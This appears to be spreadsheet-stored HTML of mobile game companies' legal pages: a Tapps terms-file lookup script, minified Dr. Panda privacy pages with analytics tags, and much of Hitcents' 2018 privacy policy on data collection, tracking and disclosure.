			"br.com.tapps.wolfevolution": termsFiles.general,
			"br.com.tapps.mobaidlelegends": termsFiles.general,
			"br.com.tapps.bostondonuttruck": termsFiles.general,
			"br.com.tapps.bitcoininc": termsFiles.general,
			"br.com.tapps.mergegarden":termsFiles.general,
			"br.com.tapps.myevolutionalbum": termsFiles.general,
			"com.tapps.intothedeepweb": termsFiles.generalpt,
			"com.tapps.roguelike.rpg.cardguardians": termsFiles.generalpt,
			"com.tapps.games.dig.dinoquest2": termsFiles.generalpt,
			"com.tapps.idle.clicker.upgrade.moneytree2": termsFiles.generalpt,
			"com.tapps.virtual.pet.games.myboo2": termsFiles.generalpt
		}
		correctFile = gameList[app]
		if (typeof correctFile == 'undefined') {
			correctFile = termsFiles.general;
			console.log("APP: "+app+" not found. Using general file.");
		} else {
			console.log("APP: "+app+" TermsFile: "+gameList[app]);
		}
		console.log(correctFile+'.htm');
		 $('#TermsDiv').load(correctFile+'.htm');
	&lt;/script&gt;
	&lt;script src="https://code.jquery.com/jquery.js"&gt;&lt;/script&gt;
	&lt;!-- // &lt;script src="js/bootstrap.min.js"&gt;&lt;/script&gt; --&gt;
	&lt;script&gt;
		(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
		(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
		m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
		})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
		ga('create', 'UA-26125615-8', 'auto');
		ga('send', 'pageview');
	&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang =en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;title&gt;Dr. Panda Privacy&lt;/title&gt;&lt;meta name=description content="Dr. Panda description"&gt;&lt;meta name=keywords content="Dr.</t>
  </si>
  <si>
    <t xml:space="preserve">Panda keywords"&gt;&lt;link rel=icon href=/favicon.ico&gt;&lt;link href=https://preview-web.xiongmaoboshi.com/website/page/games/data.js rel=preload as=script&gt;&lt;link href=https://preview-web.xiongmaoboshi.com/website/page/public/data.js rel =preload as=script&gt;&lt;link href=/css/chunk-common.5a44da20.css rel=preload as=style&gt;&lt;link href=/css/chunk-vendors.57b5595f.css rel=preload as=style&gt;&lt;link href=/css/privacy.3268cc5f.css rel=preload as=style&gt;&lt;link href=/js/chunk-common.66cb6c46.js rel=preload as=script&gt;&lt;link href=/js/chunk-vendors.91b864e5.js rel=preload as=script&gt;&lt;link href=/js/privacy.df0fd7ad.js rel=preload as=script&gt;&lt;link href=/css/chunk-vendors.57b5595f.css rel=stylesheet&gt;&lt;link href=/css/chunk-common.5a44da20.css rel=stylesheet&gt;&lt;link href=/css/privacy.3268cc5f.css rel=stylesheet&gt;&lt;/head&gt;&lt;script&gt;// 谷歌统计SDK
  (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
    new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
    </t>
  </si>
  <si>
    <t>j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
    'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-5GX3CJV');&lt;/script&gt;&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5GX3CJV" height=0 width=0 style=display:none;visibility:hidden&gt;&lt;/iframe&gt;&lt;/noscript&gt;&lt;script&gt;window.onload=function(){ 
      if(window.location.href.indexOf("xiongmaoboshi") &gt; -1) {
        console.log("here should be google tag");
        window.dataLayer = window.dataLayer || [];
        function gtag(){
          dataLayer.push(arguments);}
          gtag('js', new Date());
          gtag('config', 'UA-36479556-6');
          var script=document.createElement('script');
          script.type='text/javascript';
          script.src='https://www.googletagmanager.com/gtag/js?id=UA-36479556-6';
          script.async='async';
          document.body.appendChild(script);
      }
    }&lt;/script&gt;&lt;body oncontextmenu="return false"&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but Dr. Panda Privacy doesn't work properly without JavaScript enabled.</t>
  </si>
  <si>
    <t>Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;script src=https://preview-web.xiongmaoboshi.com/website/page/games/data.js&gt;&lt;/script&gt;&lt;script src=https://preview-web.xiongmaoboshi.com/website/page/public/data.js&gt;&lt;/script&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=/js/chunk-vendors.91b864e5.js&gt;&lt;/script&gt;&lt;script src=/js/chunk-common.66cb6c46.js&gt;&lt;/script&gt;&lt;script src=/js/privacy.df0fd7ad.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang =en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;title&gt;Dr. Panda redirect&lt;/title&gt;&lt;meta name=description content="Dr. Panda description"&gt;&lt;meta name=keywords content="Dr.</t>
  </si>
  <si>
    <t>Panda keywords"&gt;&lt;link rel=icon href=/favicon.ico&gt;&lt;link href=https://preview-web.xiongmaoboshi.com/website/page/games/data.js rel=preload as=script&gt;&lt;link href=https://preview-web.xiongmaoboshi.com/website/page/public/data.js rel =preload as=script&gt;&lt;link href=/css/chunk-common.25a77f99.css rel=preload as=style&gt;&lt;link href=/css/chunk-vendors.cbc2a074.css rel=preload as=style&gt;&lt;link href=/js/403.9d48461d.js rel=preload as=script&gt;&lt;link href=/js/chunk-common.c2cbfaa6.js rel=preload as=script&gt;&lt;link href=/js/chunk-vendors.ae9bfe02.js rel=preload as=script&gt;&lt;link href=/css/chunk-vendors.cbc2a074.css rel=stylesheet&gt;&lt;link href=/css/chunk-common.25a77f99.css rel=stylesheet&gt;&lt;/head&gt;&lt;body oncontextmenu="return false"&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but Dr. Panda redirect doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;script src=https://preview-web.xiongmaoboshi.com/website/page/games/data.js&gt;&lt;/script&gt;&lt;script src=https://preview-web.xiongmaoboshi.com/website/page/public/data.js&gt;&lt;/script&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=/js/chunk-vendors.ae9bfe02.js&gt;&lt;/script&gt;&lt;script src=/js/chunk-common.c2cbfaa6.js&gt;&lt;/script&gt;&lt;script src=/js/403.9d48461d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Privacy Policy | Hitcents&lt;/title&gt;
&lt;meta charset='utf-8'&gt;
&lt;meta content='IE=edge' http-equiv='X-UA-Compatible'&gt;
&lt;meta content='width=device-width, initial-scale=1' name='viewport'&gt;
&lt;meta content='Privacy Policy' name='description'&gt;
&lt;script id='mcjs'&gt;
!function(c,h,i,m,p){m=c.createElement(h),p=c.getElementsByTagName(h)[0],m.async=1,m.src=i,p.parentNode.insertBefore(m,p)}(document,"script","https://chimpstatic.com/mcjs-connected/js/users/290d62ed8dd689f587443c15f/f9d86e4b2335e0deb13301309.js");
&lt;/script&gt;
&lt;meta name="csrf-param" content="authenticity_token" /&gt;
&lt;meta name="csrf-token" content="MkkGArdj079CzQQHpuwVZv6kZbuN6Y6rVekh2MJ8kqEWJELnKng/RmUxMAvIDRnmJ3xZs0hYUeyzFGcZ3LiYxg==" /&gt;
&lt;link href='https://fonts.googleapis.com' rel='preconnect'&gt;
&lt;link href='https://www.gstatic.com' rel='preconnect'&gt;
&lt;link href='https://www.google-analytics.com' rel='preconnect'&gt;
&lt;link href='https://fonts.googleapis.com/css?family=Raleway:300,400,700,700i,800|Roboto:300,300i,400,400i,500,700' rel='stylesheet' type='text/css'&gt;
&lt;link rel="stylesheet" media="all" href="/assets/application-15ea0d9a762cd6715e6e1ff15e0c3a786e876295d90125bc3f7dca7f1c0c70dc.css" data-turbolinks-track="reload" /&gt;
&lt;link rel="shortcut icon" type="image/png" href="/assets/favicon-0c27b9620339dea68c623a352b4563cfb2fa6528a61aa2b6d86cf17e7aff40c0.png" /&gt;
&lt;script async='' src='https://www.googletagmanager.com/gtag/js?id=UA-36711777-21'&gt;&lt;/script&gt;
&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-36711777-21');
&lt;/script&gt;
&lt;script src="/assets/application-fe18a95d5533a1b355c91ca2f79ef594f5d6e3908000b3d4eec6a1fdbd3f0aa1.js" data-turbolinks-track="reload"&gt;&lt;/script&gt;
&lt;/head&gt;
&lt;body class='pagescontroller pages privacy'&gt;
&lt;div class='wrapper'&gt;
&lt;div class='header1 relative'&gt;
&lt;div class='top'&gt;
&lt;div class='container-fluid'&gt;
&lt;div class='row'&gt;
&lt;div class='col-12'&gt;
&lt;div class='pull-left'&gt;
&lt;div class='logo'&gt;&lt;a</t>
  </si>
  <si>
    <t>href="/"&gt;&lt;img srcset="/assets/logo-1x-acc84787e8fe2ef863568fb8ec675cb85998b6eda2be2b36c6cd146938f527c4.png 1x, /assets/logo-2x-56e6cfefc045b46797478ef96e9f9acabd70db708a840c4d6575b9591c7743b1.png 2x, /assets/logo-3x-f4d0640eb80a5c005401a6764cd9707599235baa092db437f53c92a5bc53c3c0.png 3x" src="/assets/logo-d02f0a743e27e147ccdc6c8583f842182d42f2607dfa2ca755a75a0d0f140645.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;nav class='text-right'&gt;
&lt;ul class='list-unstyled list-inline'&gt;
&lt;li class='list-inline-item'&gt;&lt;a href="/games"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li class='list-inline-item'&gt;&lt;a href="/about"&gt;About&lt;/a&gt;&lt;/li&gt;
&lt;li class='list-inline-item'&gt;&lt;a href="/publishing"&gt;Publish&lt;/a&gt;&lt;/li&gt;
&lt;li class='list-inline-item'&gt;&lt;a href="/news"&gt;News&lt;/a&gt;&lt;/li&gt;
&lt;li class='list-inline-item'&gt;&lt;a href="/contact"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;li class='list-inline-item line-break'&gt;
&lt;a&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li class='list-inline-item social'&gt;
&lt;a target="_blank" rel="noreferrer" href="https://twitter.com/Hitcents"&gt;&lt;i class="fab fa-twitter"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li class='list-inline-item social'&gt;
&lt;a target="_blank" rel="noreferrer" href="https://www.facebook.com/hitcentscom"&gt;&lt;i class="fab fa-facebook-f"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li class='list-inline-item social'&gt;
&lt;a target="_blank" rel="noreferrer" href="https://discord.gg/hitcents"&gt;&lt;i class="fab fa-discord"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li class='list-inline-item social'&gt;
&lt;a target="_blank" rel="noreferrer" href="https://www.tiktok.com/@hitcentspublisher"&gt;&lt;i class="fab fa-tiktok"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li class='list-inline-item social'&gt;
&lt;a target="_blank" rel="noreferrer" href="https://www.youtube.com/@Hitcents"&gt;&lt;i class="fab fa-youtube"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/nav&gt;
&lt;div class='mobile-menu-btn'&gt;
&lt;div class='bar'&gt;&lt;/div&gt;
&lt;div class='bar'&gt;&lt;/div&gt;
&lt;div class='bar last'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fixed header1'&gt;
&lt;div class='top'&gt;
&lt;div class='container-fluid'&gt;
&lt;div class='row'&gt;
&lt;div class='col-12'&gt;
&lt;div class='pull-left'&gt;
&lt;div class='logo'&gt;&lt;a</t>
  </si>
  <si>
    <t xml:space="preserve">href="/"&gt;&lt;img srcset="/assets/logo-1x-acc84787e8fe2ef863568fb8ec675cb85998b6eda2be2b36c6cd146938f527c4.png 1x, /assets/logo-2x-56e6cfefc045b46797478ef96e9f9acabd70db708a840c4d6575b9591c7743b1.png 2x, /assets/logo-3x-f4d0640eb80a5c005401a6764cd9707599235baa092db437f53c92a5bc53c3c0.png 3x" src="/assets/logo-d02f0a743e27e147ccdc6c8583f842182d42f2607dfa2ca755a75a0d0f140645.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;nav class='text-right'&gt;
&lt;ul class='list-unstyled list-inline'&gt;
&lt;li class='list-inline-item'&gt;&lt;a href="/games"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li class='list-inline-item'&gt;&lt;a href="/about"&gt;About&lt;/a&gt;&lt;/li&gt;
&lt;li class='list-inline-item'&gt;&lt;a href="/publishing"&gt;Publish&lt;/a&gt;&lt;/li&gt;
&lt;li class='list-inline-item'&gt;&lt;a href="/news"&gt;News&lt;/a&gt;&lt;/li&gt;
&lt;li class='list-inline-item'&gt;&lt;a href="/contact"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;li class='list-inline-item line-break'&gt;
&lt;a&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li class='list-inline-item social'&gt;
&lt;a target="_blank" rel="noreferrer" href="https://twitter.com/Hitcents"&gt;&lt;i class="fab fa-twitter"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li class='list-inline-item social'&gt;
&lt;a target="_blank" rel="noreferrer" href="https://www.facebook.com/hitcentscom"&gt;&lt;i class="fab fa-facebook-f"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li class='list-inline-item social'&gt;
&lt;a target="_blank" rel="noreferrer" href="https://discord.gg/hitcents"&gt;&lt;i class="fab fa-discord"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li class='list-inline-item social'&gt;
&lt;a target="_blank" rel="noreferrer" href="https://www.tiktok.com/@hitcentspublisher"&gt;&lt;i class="fab fa-tiktok"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li class='list-inline-item social'&gt;
&lt;a target="_blank" rel="noreferrer" href="https://www.youtube.com/@Hitcents"&gt;&lt;i class="fab fa-youtube"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/nav&gt;
&lt;div class='mobile-menu-btn'&gt;
&lt;div class='bar'&gt;&lt;/div&gt;
&lt;div class='bar'&gt;&lt;/div&gt;
&lt;div class='bar last'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='mobile-links'&gt;
</t>
  </si>
  <si>
    <t>&lt;ul class='list-unstyled'&gt;
&lt;li&gt;&lt;a href="/games"&gt;&lt;i class="fas fa-gamepad"&gt;&lt;/i&gt; Games&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="/about"&gt;&lt;i class="fas fa-fingerprint"&gt;&lt;/i&gt; About&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="/publishing"&gt;&lt;i class="fas fa-store"&gt;&lt;/i&gt; Publish&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="/news"&gt;&lt;i</t>
  </si>
  <si>
    <t>class="fas fa-bullhorn"&gt;&lt;/i&gt; News&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="/contact"&gt;&lt;i class="fas fa-at"&gt;&lt;/i&gt; Contact&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;div class='container-fluid max-1350' id='terms'&gt;
&lt;div class='row'&gt;
&lt;div class='col-sm-12'&gt;
 &lt;h1 style='font-size: 25px;'&gt;Privacy Policy&lt;/h1&gt;
&lt;p&gt;Updated on: March 1, 2018&lt;/p&gt;
&lt;p&gt;
Welcome to Hitcents.com, Inc.</t>
  </si>
  <si>
    <t>Your privacy is important to us.
 &lt;/p&gt;
&lt;p&gt;
Hitcents.com, Inc. and its affiliates (“Hitcents”, “us”, “our” or “we”) are dedicated to protecting the privacy rights of our users (“users” or “you”). This Privacy Policy (the “Policy”) describes the ways we collect, store, use and manage the information, including personal information, that you provide or we collect in connection with our websites at www.hitcents.com and www.hitcentsgames.com (the “Sites”) or any related Hitcents software applications provided on a mobile platform (for example, iOS and Android)(collectively, the “Services”).</t>
  </si>
  <si>
    <t xml:space="preserve">Please note that the scope of this Policy is limited to information collected or received by Hitcents through your use of the Services. Hitcents is not responsible for the actions of third party people or companies, the content of their sites, the use of information you provide to them or any products or services they may offer. Any link to those sites does not constitute our sponsorship of, or affiliation with, those people or companies.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
&lt;p&gt;
By using the Services, you are expressing your agreement to this Policy and the processing of your data, including your personal information, in the manner provided in this Policy. If you do not agree to these terms, please do not use the Services.
 &lt;/p&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">If you have questions or concerns about this Policy or our privacy practices, please contact us at appsupport@Hitcents.com.
 &lt;/p&gt;
&lt;h4&gt;Information Collection and Use&lt;/h4&gt;
&lt;p&gt;
Hitcents collects information as described below. Hitcents’ primary goals in collecting and using information are to create your account, provide Services to you, improve our Services, contact you, conduct research and create reports for internal use.  </t>
  </si>
  <si>
    <t xml:space="preserve">We store information on servers and equipment located in the United States and other countries.
 &lt;/p&gt;
&lt;p&gt;
 In order to use our community forum, you must register and provide a username, password and email address.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;h4&gt;Hitcents’ Sites&lt;/h4&gt;
&lt;p&gt;
While you are browsing Hitcents’ Sites, your computer’s operating system, Internet Protocol (IP) address, access times, browser type and language and referring website addresses may be logged automatically. We may use this information to monitor, develop and analyze your use of the Services. In addition, we may ask you to submit and we may process data that is personal to you, including but not limited to your name, profile photo, gender, age or birthday, links to your profiles on social networking websites and other third party sites, user names and e-mail and mail addresses.</t>
  </si>
  <si>
    <t>We may use this information to create a user profile and provide you Services. We may use your email address to contact you about your experience with Hitcents’ Services and notify you about company news and promotions. Your gender and birthday may be used to analyze user trends and target certain promotions.</t>
  </si>
  <si>
    <t xml:space="preserve">Your mail address may be used if we have merchandise or other physical promotional materials that we want to send to you. If you no longer wish to receive these types of promotional materials, you may opt-out from receiving them at any time by emailing us at appsupport@Hitcents.com.
 &lt;/p&gt;
&lt;h4&gt;Forums/Private Messages&lt;/h4&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t>Our Sites offer publicly accessible blogs, private messages or community forums. You should be aware that any information you provide in these areas may be read, collected and used by others who access them. To request removal of your personal information from our blog or community forum, contact us at appsupport@Hitcents.com.</t>
  </si>
  <si>
    <t xml:space="preserve">In some cases, we may not be able to remove your personal information, in which case we will let you know if we are unable to do so and why.
 &lt;/p&gt;
&lt;p&gt;
If you choose to use Facebook Connect to use our blog or community forums, the information you provide is tied to your Facebook account. You will need to contact Facebook directly in order to request removal of personal information from our blog or community forum.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;h4&gt;Social Media (Features) and Widgets&lt;/h4&gt;
&lt;p&gt;
Our Sites include Social Media Features, such as the Facebook Like button, and Widgets, such as the Share button or interactive mini-programs that run on our Sites. These Features may collect your IP address, which page you are visiting on our Sites, and may set a cookie to enable the Feature to function properly. Social Media Features and Widgets are either hosted by a third party or hosted directly on our Sites.</t>
  </si>
  <si>
    <t xml:space="preserve">Your interactions with these Features are governed by the privacy policy of the company providing it.
 &lt;/p&gt;
&lt;h4&gt;iOS and Android Platforms&lt;/h4&gt;
&lt;p&gt;
When you use any of the Hitcents games or applications on a mobile platform, we may collect and record certain information such as your unique device ID (persistent/non-persistent), hardware type, media access control (“MAC”) address, international mobile equipment identity (“IMEI”), the version of your operating system (“OS”), your device name, your email address (if you have connected to Facebook or Google+), and your location (based on your Internet Protocol (“IP”) address). This information is useful to us for troubleshooting and helps us understand usage trends.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;p&gt;
 We may collect your location based information for the purpose of providing you with the correct version of the application and so you may interact with other users of the games. We will not share this information with any third party without your permission.</t>
  </si>
  <si>
    <t xml:space="preserve">If you no longer wish to allow us to track or use this information, you may turn it off by changing your device settings. Please note, the application may not work properly if we are unable to tell where you are located.
 &lt;/p&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t>In addition, we create a unique user ID to track your use of our Services. This unique user ID is stored in connection with your profile information to track the Hitcents games you are playing.
 &lt;/p&gt;
&lt;h4&gt;Facebook Connect, Game Center and Google+&lt;/h4&gt;
&lt;p&gt;
You can log in to our Sites using sign-in services (“SN Service”) such as Facebook Connect, LinkedIn, Apple’s Game Center, or an Open ID provider.</t>
  </si>
  <si>
    <t>These services will authenticate your identity and provide you the option to share certain personal information with us such as your name, email address, and resume to pre-populate our sign up form. Services like Facebook Connect give you the option to post information about your activities on this website to your profile page to share with others within your network.
 &lt;/p&gt;
&lt;p&gt;
We may collect and record information through the SN Service in accordance with the policies and terms of that SN Service.</t>
  </si>
  <si>
    <t>The information we collect when you connect your user account to an SN Service may include: (1) your name, (2) your SN Service user identification number and/or user name, (3) locale, city, state and country, (4) sex, (5) birth date, (6) email address, (7) profile picture or its URL and (8) the SN Service user identification numbers for your friends that are also connected to the Hitcents game(s).
 &lt;/p&gt;
&lt;p&gt;
If you want us to delete the data we receive from Facebook, Game Center or Google+ about you, please contact us at appsupport@Hitcents.com.
 &lt;/p&gt;
&lt;h4&gt;Invite a Friend&lt;/h4&gt;
&lt;p&gt;
Hitcents may offer you the opportunity to invite your contacts from a SN Service (such as your Facebook friends) so that those contacts can be located in Hitcents’ games and/or you can invite them to join you in Hitcents’ games.</t>
  </si>
  <si>
    <t xml:space="preserve">Such contact information will be used only for the purpose of sending communications to the addressee. You or the third party may contact us at appsupport@Hitcents.com to request the removal of this information from our database to the extent Hitcents stores any of this information.
 &lt;/p&gt;
&lt;h4&gt;Customer Service&lt;/h4&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">We may collect your email address when you contact our customer service group and we may use that email address to contact you about your gaming experience with Hitcents games and notify you about company news and promotions. If you no longer wish to receive certain email notifications you may opt-out at any time by following the unsubscribe link located at the bottom of each communication or by emailing us at appsupport@Hitcents.com.
 &lt;/p&gt;
&lt;h4&gt;Push Notifications&lt;/h4&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">We may occasionally send you push notifications through our mobile applications to send you game updates, high scores and other service related notifications that may be of importance to you. You may at any time opt-out from receiving these types of communications by changing your device settings.
 &lt;/p&gt;
&lt;h4&gt;Game Data Collection&lt;/h4&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t>Whenever you play our games, we collect data about all of your interactions with the game and with the other players inside the game via server log files. This information may be associated with your player ID, IP address or device ID for the purpose of providing you our Services and improving them. This data is stored on servers located in the United States and other countries.</t>
  </si>
  <si>
    <t xml:space="preserve">With your permission, we may also collect your exact location so that we are able to match you with other players in your area.
 &lt;/p&gt;
&lt;h4&gt;Other Collection&lt;/h4&gt;
&lt;p&gt;
 We may also acquire information from you through (1) your access and participation in message boards on the Services, (2) your participation in surveys regarding the Services or (3) your participation in a sweepstakes or contest through the Services.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;p&gt;
 We may provide you the opportunity to participate in a sweepstakes or contest through our Services. If you participate, we will request certain personal information from you.</t>
  </si>
  <si>
    <t xml:space="preserve">Participation in these sweepstakes and contests is voluntary and you therefore have a choice whether or not to disclose this information. The requested information typically includes contact information (such as name and shipping address) and demographic information (such as zip or postal code).
 &lt;/p&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">We use this information to notify winners and award prizes, to monitor traffic or personalize the Services. We may use a third party service provider to conduct these sweepstakes or contests; that company is prohibited from using your users’ personal information for any other purpose.
 &lt;/p&gt;
&lt;h4&gt;Tracking Technologies&lt;/h4&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">We and our marketing and outsourcing partners, affiliates or analytics service providers use technologies such as cookies, beacons, scripts and tags to identify a user’s computer or device and to “remember” things about your visit, such as your preferences or a user name and password. Information contained in a cookie may be linked to your personal information, such as your user ID, for purposes such as improving the quality of our Services, tailoring recommendations to your interests and making the Services easier to use. You can disable cookies at any time, although you may not be able to access or use features of the Services.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;p&gt;
We may feature advertisements served by third parties that deliver cookies to your computer or device so the content you access and advertisements you see can be tracked. Since the third party advertising companies associate your computer or device with a number, they will be able to recognize your computer or device each time they send you an advertisement. These advertisers may use information about your visits to our Services and third party sites and applications in order to measure advertisement performance and to provide advertisements about goods and services of interest to you.</t>
  </si>
  <si>
    <t xml:space="preserve">This Policy does not apply to, and we are not responsible for, the data collection practices of these third party advertisers, and we encourage you to check their privacy policies to learn more about their use of cookies and other technology.
 &lt;/p&gt;
&lt;p&gt;
 You may contact us at appsupport@hitcents.com for information on how to opt-out of the use of cookies for the delivery of more relevant advertising.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;h4&gt;Mobile Analytics&lt;/h4&gt;
&lt;p&gt;
 We use mobile analytics software to allow us to better understand the functionality of our mobile software on your device. This software may record information such as how often you use the application, the events that occur within the application, aggregated usage, performance data and where the application was downloaded.</t>
  </si>
  <si>
    <t>We do not link the information we store within the analytics software to any personal information you submit within the mobile application.
 &lt;/p&gt;
&lt;h4&gt;Third Party Services&lt;/h4&gt;
&lt;p&gt;
 Our Services may contain third party tracking tools from our service providers, examples of which include Google Analytics and MobileAppTracking by Tune.</t>
  </si>
  <si>
    <t>Such third parties may use cookies, APIs and SDKs in our Services to enable them to collect and analyze user information on our behalf. The third parties may have access to information such as your device identifier, MAC address, IMEI, locale (specific location where a given language is spoken), geo-location information and IP address for the purpose of providing their services under their respective privacy policies. This Policy does not cover the use of tracking tools from third parties.</t>
  </si>
  <si>
    <t>We do not have access or control over these third parties.
 &lt;/p&gt;
&lt;p&gt;
Please refer to our list of analytics partners within the Services and for more information on how to opt-out at: appsupport@Hitcents.com.
&lt;/p&gt;
&lt;h4&gt;Ad Networks&lt;/h4&gt;
&lt;p&gt;
 We may feature advertising within our Services.</t>
  </si>
  <si>
    <t xml:space="preserve">The advertisers may collect and use information about you, such as your session activity, device identifier, MAC address, IMEI, geo-location information and IP address. They may use this information to provide advertisements of interest to you. Please refer to our list of partners within the Services and for more information on how to opt-out at: appsupport@Hitcents.com.
&lt;/p&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">In addition, you may see our games advertised in other services. After clicking on one of these advertisements and installing our game, you will become a user of our Services. In order to verify the installs, a device identifier may be shared with the advertiser.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;h4&gt;How We Use Information&lt;/h4&gt;
&lt;p&gt;
We use information collected through our Services for purposes described in this Policy or disclosed to you in connection with our Services. For example, we may use your information to:
&lt;/p&gt;
&lt;ul style='margin-left: 20px;'&gt;
&lt;li&gt;create game accounts and allow users to play our games;&lt;/li&gt;
&lt;li&gt;identify and suggest connections with other Hitcents users;&lt;/li&gt;
&lt;li&gt;operate and improve our Services;&lt;/li&gt;
&lt;li&gt;understand you and your preferences to enhance your experience and enjoyment using our Services;&lt;/li&gt;
&lt;li&gt;respond to your comments and questions and provide customer service;&lt;/li&gt;
&lt;li&gt;provide and deliver products and services you request;&lt;/li&gt;
&lt;li&gt;send you related information, including confirmations, invoices, technical notices, updates, security alerts, and support and administrative messages;&lt;/li&gt;
&lt;li&gt;communicate with you about promotions, rewards, upcoming events and other news about products and services offered by Hitcents and our selected partners;&lt;/li&gt;
&lt;li&gt;enable you to communicate with other users; and&lt;/li&gt;
&lt;li&gt;link or combine it with other information we get from third parties, to help understand your preferences and provide you with better Services.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Disclosure of Your Information&lt;/h4&gt;
&lt;p&gt;
 Hitcents does not share your personal information except as approved by you or as described below:
&lt;/p&gt;
&lt;ul style='margin-left: 20px;'&gt;
&lt;li&gt;With your consent, for example, when you agree to our sharing your information with other third parties for their own marketing purposes subject to their separate privacy policies.</t>
  </si>
  <si>
    <t>If you no longer wish to allow us to share your information with third parties, please contact us at appsupport@Hitcents.com. If you no longer wish to receive such communications from third parties, please contact that third party directly.&lt;/li&gt;
&lt;li&gt;Hitcents may engage other companies and individuals to perform services on our behalf. Example of these services include analyzing data and providing customer support.</t>
  </si>
  <si>
    <t xml:space="preserve">These agents and service providers may have access to your personal information in connection with the performance of services for Hitcents.&lt;/li&gt;
&lt;li&gt;We may release your information as permitted by law, such as to comply with a subpoena, or when we believe that release is appropriate to comply with the law, investigate fraud, respond to a government request, enforce or apply our rights, or protect the rights, property or safety of us or our users or others. This includes exchanging information with other companies and organizations for fraud protection.&lt;/li&gt;
